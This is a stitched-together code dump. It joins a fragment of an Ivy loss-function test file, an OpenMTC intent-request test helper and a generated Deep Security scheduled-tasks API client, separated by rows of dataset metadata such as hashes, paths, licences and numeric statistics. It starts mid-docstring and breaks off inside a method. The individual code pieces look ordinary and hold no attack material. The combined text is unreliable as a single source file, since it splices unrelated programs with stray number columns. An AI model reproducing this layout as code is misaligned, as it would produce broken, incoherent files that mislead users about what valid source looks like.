    exercises the function/instance/container/native-array call matrix.
    """
    input_dtype, x = dtype_and_x
    # BUG FIX: the original guard `if (v == [] for v in x):` evaluated a
    # generator object, which is always truthy, so every example returned
    # early and the op was never tested. `any(...)` is the intended check.
    if any(v == [] for v in x):
        return
    # BUG FIX: input_dtype is a sequence of dtype strings (it is indexed as
    # input_dtype[0]/[1] below), so `input_dtype == "float16"` was never true
    # and the torch-float16 skip never fired; membership is the intended test.
    if fw == "torch" and "float16" in input_dtype:
        return
    helpers.test_array_function(
        input_dtype,
        as_variable,
        False,
        num_positional_args,
        native_array,
        container,
        instance_method,
        fw,
        "binary_cross_entropy",
        true=np.asarray(x[0], dtype=input_dtype[0]),
        pred=np.asarray(x[1], dtype=input_dtype[1]),
    )
# sparse_cross_entropy
@given(
    dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
    as_variable=helpers.list_of_length(st.booleans(), 2),
    num_positional_args=helpers.num_positional_args(fn_name="sparse_cross_entropy"),
    native_array=helpers.list_of_length(st.booleans(), 2),
    container=helpers.list_of_length(st.booleans(), 2),
    instance_method=st.booleans(),
)
def test_sparse_cross_entropy(
    dtype_and_x,
    as_variable,
    num_positional_args,
    native_array,
    container,
    instance_method,
    fw,
):
    """Property-test ivy.sparse_cross_entropy on backend *fw*.

    Hypothesis supplies the (dtypes, values) pair; helpers.test_array_function
    exercises the function/instance/container/native-array call matrix.
    """
    input_dtype, x = dtype_and_x
    # BUG FIX: the original guard `if (v == [] for v in x):` evaluated a
    # generator object, which is always truthy, so every example returned
    # early and the op was never tested. `any(...)` is the intended check.
    if any(v == [] for v in x):
        return
    # BUG FIX: input_dtype is a sequence of dtype strings (it is indexed as
    # input_dtype[0]/[1] below), so `input_dtype == "float16"` was never true
    # and the torch-float16 skip never fired; membership is the intended test.
    if fw == "torch" and "float16" in input_dtype:
        return
    helpers.test_array_function(
        input_dtype,
        as_variable,
        False,
        num_positional_args,
        native_array,
        container,
        instance_method,
        fw,
        "sparse_cross_entropy",
        true=np.asarray(x[0], dtype=input_dtype[0]),
        pred=np.asarray(x[1], dtype=input_dtype[1]),
    )
| 26.393443
| 84
| 0.661801
| 430
| 3,220
| 4.611628
| 0.137209
| 0.075643
| 0.102874
| 0.086233
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0
| 0.012092
| 0.229503
| 3,220
| 121
| 85
| 26.61157
| 0.787183
| 0.021118
| 0
| 0.825688
| 0
| 0
| 0.045137
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027523
| false
| 0
| 0.036697
| 0
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
960c6141c0dee5b1de61ee32614e1a4a93c10b2f
| 9,754
|
py
|
Python
|
eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
from openmtc_scl.serializer import JsonSerializer
from IntentHandling import IntentHandler
from openmtc.response import RetrieveResponseConfirmation, CreateResponseConfirmation, DeleteResponseConfirmation, ErrorResponseConfirmation
retargeturl = "http://localhost:6001"
def test_retarget(request_handler, logger, config, method, path):
    """Run a generic *method* request against retargeturl+*path* through IntentHandler.

    Builds an intent-style payload, parses and handles it, and logs the
    result; nothing is asserted.
    """
    payload = {"method":method,
               "path":retargeturl+path,
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    # result = json.loads(result.decode("utf-8"))
    logger.info("result is "+str(result))
    # if result is not None:
    #     if isinstance(result[1], IntentError):
    #         logger.info("error while sending request")
    #         # result.sendIntent(context, self.action, self.issuer)
    #     elif isinstance(result[1], Response):
    #         logger.info("hurray"+str(result["response"]))
def test_create_app(request_handler, logger, config, app_name):
    """Create an m2m application named *app_name* via an intent create request."""
    payload = {"method":"create",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications",
               "content":"{\"application\":{\"appId\":\""+app_name+"\"}}",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_create_app_with_search_str(request_handler, logger, config, app_name, search_string):
    """Create application *app_name*, attaching *search_string* as a searchString.

    Delegates to test_create_app when search_string is None.
    """
    if search_string is None:
        test_create_app(request_handler, logger, config, app_name)
    else:
        # JSON body is hand-built; app_name/search_string are not escaped.
        payload = {"method":"create",
                   "content_type":"application/json",
                   "path":retargeturl+"/m2m/applications",
                   "content":"{\"application\":{\"appId\":\""+app_name+"\", \"searchStrings\":{\"searchString\":[\""+search_string+"\"]}}}",
                   "replyAction":"intent://test_action",
                   "requestId":"123"
                   }
        # reference = "someRef"
        # subscriptionId = "someSubscrId"
        intentHandler = IntentHandler(logger, config)
        request = intentHandler.parseRequest("test_issuer",payload, None)
        result = intentHandler.handleParsedRequest(request, request_handler, None)
        logger.info("result is "+str(result))
def test_create_app_property(request_handler, logger, config, app_name, prop_name):
    """Create container *prop_name* under application *app_name*."""
    payload = {"method":"create",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name+"/containers",
               "content":"{\"container\":{\"id\":\""+prop_name+"\"}}",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_get_latest_data_of_property(request_handler, logger, config, app_name, prop_name):
    """Retrieve the latest contentInstance of container *prop_name* and log its content."""
    payload = {"method":"retrieve",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+prop_name+"/contentInstances/latest",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
    # On a successful retrieve, serialize the returned resource for the log.
    # NOTE(review): assumes result is a mapping with a "response" key — raises
    # KeyError/TypeError otherwise; confirm handleParsedRequest's contract.
    response = result["response"]
    if isinstance(response, RetrieveResponseConfirmation):
        if response.resource is not None:
            serializer = JsonSerializer()
            content = serializer.encode(response.resource)
            logger.info("response content is "+content)
def test_get_all_properties(request_handler, logger, config, app_name):
    """Retrieve all containers of application *app_name* and log the serialized result."""
    payload = {"method":"retrieve",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name+"/containers",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
    # On a successful retrieve, serialize the returned resource for the log.
    # NOTE(review): assumes result is a mapping with a "response" key — raises
    # KeyError/TypeError otherwise; confirm handleParsedRequest's contract.
    response = result["response"]
    if isinstance(response, RetrieveResponseConfirmation):
        if response.resource is not None:
            serializer = JsonSerializer()
            content = serializer.encode(response.resource)
            logger.info("response content is "+content)
def test_subscribe_apps_with_search_str(request_handler, logger, config, search_string, contact):
    """Subscribe *contact* to application events, optionally filtered by *search_string*."""
    # Subscription JSON is assembled by string concatenation; the
    # filterCriteria clause is only added when a search string is supplied.
    content = "{\"subscription\":{\"contact\":\""+contact+"\""
    if search_string is not None:
        content = content+", \"filterCriteria\":{\"searchStrings\":{\"searchString\":[\""+search_string+"\"] }}"
    content = content+ "}}"
    logger.info("content is "+content)
    payload = {"method":"create",
               "path":retargeturl+"/m2m/applications/subscriptions",
               "replyAction":contact,
               "requestId":"123",
               "content_type":"application/json",
               "content":content
               }
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
'''
def update_subscription
def test_unsubscribe_apps_with_search_str(request_handler, logger, config, search_string, contact):
'''
def test_discover_apps_with_search_str(request_handler, logger, config, search_string, contact):
    """Run an m2m discovery filtered by *search_string*; reply goes to *contact*."""
    payload = {"method":"retrieve",
               "path":retargeturl+"/m2m/discovery?searchStrings=\""+search_string+"\"",
               "replyAction":contact,
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_get_app(request_handler, logger, config, app_name, contact):
    """Retrieve application *app_name*; reply goes to *contact*."""
    payload = {"method":"retrieve",
               "path":retargeturl+"/m2m/applications/"+app_name,
               "replyAction":contact,
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_subscribe_pushed_data(request_handler, logger, config, app_name, property_name, contact):
    """Subscribe *contact* to new contentInstances of *property_name* under *app_name*."""
    payload = {"method":"create",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+property_name+"/contentInstances/subscriptions",
               "content":"{\"subscription\":{\"contact\":\""+contact+"\"}}",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_push_data(request_handler, logger, config, app_name, property_name):
    """Push a fixed contentInstance value ("75") into container *property_name*."""
    payload = {"method":"create",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+property_name+"/contentInstances",
               "content":"{\"value\":\"75\"}",
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
def test_destroy_app(request_handler, logger, config, app_name):
    """Delete application *app_name* via an intent delete request."""
    payload = {"method":"delete",
               "content_type":"application/json",
               "path":retargeturl+"/m2m/applications/"+app_name,
               "replyAction":"intent://test_action",
               "requestId":"123"
               }
    # reference = "someRef"
    # subscriptionId = "someSubscrId"
    intentHandler = IntentHandler(logger, config)
    request = intentHandler.parseRequest("test_issuer",payload, None)
    result = intentHandler.handleParsedRequest(request, request_handler, None)
    logger.info("result is "+str(result))
| 43.73991
| 140
| 0.650502
| 894
| 9,754
| 6.941834
| 0.121924
| 0.058653
| 0.045118
| 0.058653
| 0.808895
| 0.808895
| 0.797132
| 0.768289
| 0.763616
| 0.726394
| 0
| 0.007298
| 0.213348
| 9,754
| 222
| 141
| 43.936937
| 0.801512
| 0.093705
| 0
| 0.679245
| 0
| 0
| 0.20816
| 0.01337
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018868
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9625605efffd855b2f0477ab2c11c62dce89e2cb
| 30,624
|
py
|
Python
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class ScheduledTasksApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_scheduled_task(self, scheduled_task, api_version, **kwargs): # noqa: E501
"""Create a Scheduled Task # noqa: E501
Create a new scheduled task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_scheduled_task(scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ScheduledTask scheduled_task: The settings of the new scheduled task. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_scheduled_task_with_http_info(scheduled_task, api_version, **kwargs) # noqa: E501
else:
(data) = self.create_scheduled_task_with_http_info(scheduled_task, api_version, **kwargs) # noqa: E501
return data
def create_scheduled_task_with_http_info(self, scheduled_task, api_version, **kwargs):  # noqa: E501
    """Create a Scheduled Task  # noqa: E501

    Create a new scheduled task.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_scheduled_task_with_http_info(scheduled_task, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ScheduledTask scheduled_task: The settings of the new scheduled task. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ScheduledTask
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted arguments: endpoint parameters plus the client-level options
    # shared by every generated method.
    all_params = ['scheduled_task', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: snapshot locals(), then fold **kwargs in,
    # rejecting anything not whitelisted above.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_scheduled_task" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'scheduled_task' is set
    if ('scheduled_task' not in params or
            params['scheduled_task'] is None):
        raise ValueError("Missing the required parameter `scheduled_task` when calling `create_scheduled_task`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `create_scheduled_task`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # api-version is sent as a request header, not part of the path.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The task definition travels as the JSON request body.
    body_params = None
    if 'scheduled_task' in params:
        body_params = params['scheduled_task']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/scheduledtasks', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ScheduledTask',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_scheduled_task(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Delete a Scheduled Task # noqa: E501
Delete a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_scheduled_task(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
return data
def delete_scheduled_task_with_http_info(self, scheduled_task_id, api_version, **kwargs):  # noqa: E501
    """Delete a Scheduled Task  # noqa: E501

    Delete a scheduled task by ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int scheduled_task_id: The ID number of the scheduled task to delete. (required)
    :param str api_version: The version of the api being called. (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted arguments: endpoint parameters plus the client-level options
    # shared by every generated method.
    all_params = ['scheduled_task_id', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: snapshot locals(), then fold **kwargs in,
    # rejecting anything not whitelisted above.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_scheduled_task" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'scheduled_task_id' is set
    if ('scheduled_task_id' not in params or
            params['scheduled_task_id'] is None):
        raise ValueError("Missing the required parameter `scheduled_task_id` when calling `delete_scheduled_task`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `delete_scheduled_task`")  # noqa: E501

    # NOTE(review): re.search('\d+') only requires one digit somewhere in the
    # string, not an all-digit ID — the generated pattern check is loose.
    if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `delete_scheduled_task`, must conform to the pattern `/\\d+/`")  # noqa: E501
    collection_formats = {}

    # The task ID is substituted into the URL template below.
    path_params = {}
    if 'scheduled_task_id' in params:
        path_params['scheduledTaskID'] = params['scheduled_task_id']  # noqa: E501

    query_params = []

    # api-version is sent as a request header, not part of the path.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/scheduledtasks/{scheduledTaskID}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def describe_scheduled_task(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Describe a Scheduled Task # noqa: E501
Describe a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_scheduled_task(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
return data
def describe_scheduled_task_with_http_info(self, scheduled_task_id, api_version, **kwargs):  # noqa: E501
    """Describe a Scheduled Task  # noqa: E501

    Describe a scheduled task by ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int scheduled_task_id: The ID number of the scheduled task to describe. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ScheduledTask
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted arguments: endpoint parameters plus the client-level options
    # shared by every generated method.
    all_params = ['scheduled_task_id', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: snapshot locals(), then fold **kwargs in,
    # rejecting anything not whitelisted above.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method describe_scheduled_task" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'scheduled_task_id' is set
    if ('scheduled_task_id' not in params or
            params['scheduled_task_id'] is None):
        raise ValueError("Missing the required parameter `scheduled_task_id` when calling `describe_scheduled_task`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `describe_scheduled_task`")  # noqa: E501

    # NOTE(review): re.search('\d+') only requires one digit somewhere in the
    # string, not an all-digit ID — the generated pattern check is loose.
    if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `describe_scheduled_task`, must conform to the pattern `/\\d+/`")  # noqa: E501
    collection_formats = {}

    # The task ID is substituted into the URL template below.
    path_params = {}
    if 'scheduled_task_id' in params:
        path_params['scheduledTaskID'] = params['scheduled_task_id']  # noqa: E501

    query_params = []

    # api-version is sent as a request header, not part of the path.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/scheduledtasks/{scheduledTaskID}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ScheduledTask',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_scheduled_tasks(self, api_version, **kwargs): # noqa: E501
"""List Scheduled Tasks # noqa: E501
Lists all scheduled tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_scheduled_tasks(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.list_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
return data
def list_scheduled_tasks_with_http_info(self, api_version, **kwargs): # noqa: E501
"""List Scheduled Tasks # noqa: E501
Lists all scheduled tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_scheduled_tasks_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_scheduled_tasks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_scheduled_tasks`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTasks', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_scheduled_task(self, scheduled_task_id, scheduled_task, api_version, **kwargs): # noqa: E501
"""Modify a Scheduled Task # noqa: E501
Modify a scheduled task by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_scheduled_task(scheduled_task_id, scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to modify. (required)
:param ScheduledTask scheduled_task: The settings of the scheduled task to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, **kwargs) # noqa: E501
return data
def modify_scheduled_task_with_http_info(self, scheduled_task_id, scheduled_task, api_version, **kwargs): # noqa: E501
"""Modify a Scheduled Task # noqa: E501
Modify a scheduled task by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to modify. (required)
:param ScheduledTask scheduled_task: The settings of the scheduled task to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scheduled_task_id', 'scheduled_task', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_scheduled_task" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scheduled_task_id' is set
if ('scheduled_task_id' not in params or
params['scheduled_task_id'] is None):
